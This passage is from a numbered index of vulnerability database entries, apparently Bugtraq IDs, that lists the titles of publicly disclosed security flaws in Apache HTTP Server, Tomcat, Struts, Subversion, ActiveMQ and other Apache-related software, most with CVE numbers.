7036| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
7037| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
7038| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
7039| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
7040| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
7041| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
7042| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
7043| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
7044| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
7045| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
7046| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
7047| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
7048| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
7049| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
7050| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
7051| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
7052| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
7053| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
7054| [76933] Apache James Server Unspecified Command Execution Vulnerability
7055| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
7056| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
7057| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
7058| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
7059| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
7060| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
7061| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
7062| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
7063| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
7064| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
7065| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
7066| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
7067| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
7068| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
7069| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
7070| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
7071| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
7072| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
7073| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
7074| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
7075| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
7076| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
7077| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
7078| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
7079| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
7080| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
7081| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
7082| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
7083| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
7084| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
7085| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
7086| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
7087| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
7088| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
7089| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
7090| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
7091| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
7092| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
7093| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
7094| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
7095| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
7096| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
7097| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
7098| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
7099| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
7100| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
7101| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
7102| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
7103| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
7104| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
7105| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
7106| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
7107| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
7108| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
7109| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
7110| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
7111| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
7112| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
7113| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
7114| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
7115| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
7116| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
7117| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
7118| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
7119| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
7120| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
7121| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
7122| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
7123| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
7124| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
7125| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
7126| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
7127| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
7128| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
7129| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
7130| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
7131| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
7132| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
7133| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
7134| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
7135| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
7136| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
7137| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
7138| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
7139| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
7140| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
7141| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
7142| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
7143| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
7144| [68229] Apache Harmony PRNG Entropy Weakness
7145| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
7146| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
7147| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
7148| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
7149| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
7150| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
7151| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
7152| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
7153| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
7154| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
7155| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
7156| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
7157| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
7158| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
7159| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
7160| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
7161| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
7162| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
7163| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
7164| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
7165| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
7166| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
7167| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
7168| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
7169| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
7170| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
7171| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
7172| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
7173| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
7174| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
7175| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
7176| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
7177| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
7178| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
7179| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
7180| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
7181| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
7182| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
7183| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
7184| [64780] Apache CloudStack Unauthorized Access Vulnerability
7185| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
7186| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
7187| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
7188| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
7189| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
7190| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
7191| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
7192| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
7193| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
7194| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
7195| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
7196| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
7197| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
7198| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
7199| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
7200| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
7201| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
7202| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
7203| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
7204| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
7205| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
7206| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
7207| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
7208| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
7209| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
7210| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
7211| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
7212| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
7213| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
7214| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
7215| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
7216| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
7217| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
7218| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
7219| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
7220| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
7221| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
7222| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
7223| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
7224| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
7225| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
7226| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
7227| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
7228| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
7229| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
7230| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
7231| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
7232| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
7233| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
7234| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
7235| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
7236| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
7237| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
7238| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
7239| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
7240| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
7241| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
7242| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
7243| [59670] Apache VCL Multiple Input Validation Vulnerabilities
7244| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
7245| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
7246| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
7247| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
7248| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
7249| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
7250| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
7251| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
7252| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
7253| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
7254| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
7255| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
7256| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
7257| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
7258| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
7259| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
7260| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
7261| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
7262| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
7263| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
7264| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
7265| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
7266| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
7267| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
7268| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
7269| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
7270| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
7271| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
7272| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
7273| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
7274| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
7275| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
7276| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
7277| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
7278| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
7279| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
7280| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
7281| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
7282| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
7283| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
7284| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
7285| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
7286| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
7287| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
7288| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
7289| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
7290| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
7291| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
7292| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
7293| [54798] Apache Libcloud Man In The Middle Vulnerability
7294| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
7295| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
7296| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
7297| [54189] Apache Roller Cross Site Request Forgery Vulnerability
7298| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
7299| [53880] Apache CXF Child Policies Security Bypass Vulnerability
7300| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
7301| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
7302| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
7303| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
7304| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
7305| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
7306| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
7307| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
7308| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
7309| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
7310| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
7311| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
7312| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
7313| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
7314| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
7315| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
7316| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
7317| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
7318| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
7319| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
7320| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
7321| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
7322| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
7323| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
7324| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
7325| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
7326| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
7327| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
7328| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
7329| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
7330| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
7331| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
7332| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
7333| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
7334| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
7335| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
7336| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
7337| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
7338| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
7339| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
7340| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
7341| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
7342| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
7343| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
7344| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
7345| [49290] Apache Wicket Cross Site Scripting Vulnerability
7346| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
7347| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
7348| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
7349| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
7350| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
7351| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
7352| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
7353| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
7354| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
7355| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
7356| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
7357| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
7358| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
7359| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
7360| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
7361| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
7362| [46953] Apache MPM-ITK Module Security Weakness
7363| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
7364| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
7365| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
7366| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
7367| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
7368| [46166] Apache Tomcat JVM Denial of Service Vulnerability
7369| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
7370| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
7371| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
7372| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
7373| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
7374| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
7375| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
7376| [44616] Apache Shiro Directory Traversal Vulnerability
7377| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
7378| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
7379| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
7380| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
7381| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
7382| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
7383| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
7384| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
7385| [42492] Apache CXF XML DTD Processing Security Vulnerability
7386| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
7387| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
7388| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
7389| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
7390| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
7391| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
7392| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
7393| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
7394| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
7395| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
7396| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
7397| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
7398| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
7399| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
7400| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
7401| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
7402| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
